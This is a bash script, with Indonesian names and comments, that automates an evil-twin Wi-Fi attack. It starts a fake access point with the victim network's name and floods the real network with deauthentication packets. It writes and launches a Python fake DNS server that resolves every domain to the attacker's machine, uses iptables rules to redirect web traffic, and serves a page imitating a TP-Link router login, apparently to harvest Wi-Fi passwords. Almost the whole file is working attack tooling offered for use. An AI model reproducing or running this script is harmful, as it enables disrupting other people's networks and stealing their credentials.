#!/bin/bash

clear

IP=192.168.12.1;
RANG_IP=$(echo $IP | cut -d "." -f 1,2,3);
DUMP_PATH="/home/shun/hack/tmp/evil"

fuser -n tcp -k 53 67 80 &
fuser -n udp -k 53 67 80 &

airmon-ng start wlp9s0

if [ ! -d $DUMP_PATH ]; then
        mkdir -p $DUMP_PATH &
fi

function hancur {
	sysctl -w net.ipv4.ip_forward=0
	# pemulihan create_ap
	iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
  
	iptables -w -t nat -I POSTROUTING -s 192.168.12.1/24 ! -o ap0 -j MASQUERADE || die
    iptables -w -I FORWARD -i ap0 -s 192.168.12.1/24 -j ACCEPT || die
    iptables -w -I FORWARD -i wlp9s0 -d 192.168.12.1/24 -j ACCEPT || die
    
    DNS_PORT=5353
    iptables -w -I INPUT -p tcp -m tcp --dport 5353 -j ACCEPT || die
    iptables -w -I INPUT -p udp -m udp --dport 5353 -j ACCEPT || die
    iptables -w -t nat -I PREROUTING -s 192.168.12.1/24 -d 192.168.12.1 \
         -p tcp -m tcp --dport 53 -j REDIRECT --to-ports 5353 || die
    iptables -w -t nat -I PREROUTING -s 192.168.12.1/24 -d 192.168.12.1 \
         -p udp -m udp --dport 53 -j REDIRECT --to-ports 5353 || die
         
    airmon-ng stop mon0
    airmon-ng stop wlp9s0
    iwconfig
}
function serang {

   echo ""
   echo ""
   echo "aireplay-ng -O O -a <ssid> -c <station> --ignore-negative-one mon0"
   printf "Nama wifi : "
   read WIFI
   echo ""
   printf "BSSID     : "
   read BSSID
   echo ""
   
   xterm $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -title "WIFI palsu" -e create_ap wlp9s0 wlp9s0 "$WIFI" &
   xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauth all" -e aireplay-ng -0 0 -a $BSSID --ignore-negative-one mon0 &
 
   sleep 10 &&
   
   xterm $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -title "FAKEDNS" -e "if type python2 >/dev/null 2>/dev/null; then python2 $DUMP_PATH/fakedns; else python $DUMP_PATH/fakedns; fi" &
    
   sleep 17 &&
   router &&
   
   xterm -bg "#000000" -fg "#00aa00" -title "SERVER http" -e php -t /home/shun/hack/sites/tplink -S 192.168.12.1:80

}

function router {

  iptables --flush
  iptables --table nat --flush
  iptables --delete-chain
  iptables --table nat --delete-chain
  iptables -P FORWARD ACCEPT

  iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $IP:80
  iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $IP:443
  iptables -A INPUT -p tcp --sport 443 -j ACCEPT
  iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT
  iptables -t nat -A POSTROUTING -j MASQUERADE

}

function buatfakedns {
	echo "import socket

class DNSQuery:
  def __init__(self, data):
    self.data=data
    self.dominio=''

    tipo = (ord(data[2]) >> 3) & 15
    if tipo == 0:
      ini=12
      lon=ord(data[ini])
      while lon != 0:
        self.dominio+=data[ini+1:ini+lon+1]+'.'
        ini+=lon+1
        lon=ord(data[ini])

  def respuesta(self, ip):
    packet=''
    if self.dominio:
      packet+=self.data[:2] + \"\x81\x80\"
      packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
      packet+=self.data[12:]
      packet+='\xc0\x0c'
      packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
      packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.')))
    return packet

if __name__ == '__main__':
  ip='$IP'
  print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip

  udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  udps.bind(('',53))

  try:
    while 1:
      data, addr = udps.recvfrom(1024)
      p=DNSQuery(data)
      udps.sendto(p.respuesta(ip), addr)
      print 'Request: %s -> %s' % (p.dominio, ip)
  except KeyboardInterrupt:
    print 'Finalizando'
    udps.close()" > $DUMP_PATH/fakedns
        chmod +x $DUMP_PATH/fakedns
}

buatfakedns

serang

printf "hancurkan !!! ENTER"
read
hancur






